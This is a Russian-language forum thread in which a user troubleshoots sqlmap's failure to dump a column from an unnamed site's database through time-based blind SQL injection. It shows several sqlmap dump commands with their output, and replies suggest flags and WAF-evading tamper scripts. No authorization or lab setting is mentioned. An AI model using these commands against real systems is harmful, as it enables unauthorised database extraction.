• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Проблема с sqlmap

Tapok_3310

Tapok_3310

New member
25.06.2022
4
0
BIT
2
Получилось узнать БД, таблицы и колонки к этим таблицам (через common-columns.txt)

При дампе одной из известных мне колонок через бутфорс запросом: sqlmap -u ссылка.dhtml --forms --crawl=2 -D БД -T таблица -C колонка --dump --threads=5 --hex --time-sec=15 - Приводит к такому:

[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[INFO] retrieved:
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'

Помогите, пожалуйста.
 
Сортировать по дате Сортировать по голосам
N1GGA

N1GGA

Codeby Team
Администратор
16.07.2018
366
357
BIT
489
Попробуйте с флагом --no-cast без --hex. А вообще, скорее всего там стоит полусредний WAF, и надо будет под него подбирать тамперы.
 
За 0 Против
Crazy Jack

Crazy Jack

Well-known member
08.07.2017
573
89
BIT
35
Tapok_3310 сказал(а):
Получилось узнать БД, таблицы и колонки к этим таблицам (через common-columns.txt)

При дампе одной из известных мне колонок через бутфорс запросом: sqlmap -u ссылка.dhtml --forms --crawl=2 -D БД -T таблица -C колонка --dump --threads=5 --hex --time-sec=15 - Приводит к такому:

[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[INFO] retrieved:
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'

Помогите, пожалуйста.
Нажмите, чтобы раскрыть...
Попробуй без дополнительных параметров - sqlmap -u URL -D БД -T таблица -C колонка --dump
 
За 0 Против
Tapok_3310

Tapok_3310

New member
25.06.2022
4
0
BIT
2
Crazy Jack сказал(а):
Попробуй без дополнительных параметров - sqlmap -u URL -D БД -T таблица -C колонка --dump
Нажмите, чтобы раскрыть...
Отчет:
1) Если оставить только параметры, данные вами, то он выведет критическую ошибку и попросит: "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in '
Ссылка скрыта от гостей
'). You are advised to rerun with '--forms --crawl=2'"

2) Если следовать данным рекомендациям то это приведет к такому (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump ):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'

3 c hex) При доблении --hex получаем (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --hex):
WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[INFO] retrieved:
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'

4 с no-cast) При добавлении --no-cast выведет (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --no-cast ):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'

5 с no-cast и с time-sec) При добавлении --no-cast с --time-sec=15 выведет (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --no-cast --time-sec=15):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'
 
За 0 Против
Tapok_3310

Tapok_3310

New member
25.06.2022
4
0
BIT
2
N1GGA сказал(а):
Попробуйте с флагом --no-cast без --hex. А вообще, скорее всего там стоит полусредний WAF, и надо будет под него подбирать тамперы.
Нажмите, чтобы раскрыть...
Программы WAFFWOOF и identYwaf показали что никакого WAF там нет. Правильно понимаю, что темперы подбирать не актуально?
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ